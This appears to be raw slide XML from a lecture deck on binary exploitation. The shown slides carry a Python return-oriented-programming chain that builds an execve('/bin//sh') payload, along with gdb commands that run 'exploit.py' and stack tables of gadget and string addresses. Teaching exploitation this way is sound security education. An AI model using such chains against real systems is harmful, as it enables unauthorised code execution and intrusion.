            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x807b406) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x80493e1) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print p,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>362</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137227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3">
                                            <p:txEl>
                                              <p:pRg st="21" end="21"/>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3">
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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3">
                                            <p:txEl>
                                              <p:pRg st="23" end="23"/>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3">
                                            <p:txEl>
                                              <p:pRg st="24" end="24"/>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3">
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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3">
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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3">
                                            <p:txEl>
                                              <p:pRg st="28" end="2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defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) b *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>exploit.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>`"</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363</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5908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102109916"/>
              </p:ext>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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f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0x080ea064</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0x6e69622f</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364</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9832" y="646027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71290" y="626171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0xbffff5ec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="870211341"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4961457" y="3844056"/>
          <a:ext cx="3696160" cy="276150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9450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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39450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9450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9450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9450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0xbffff5ec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39450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9450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0x08048e67</a:t>
                      </a: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766339" y="7806"/>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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
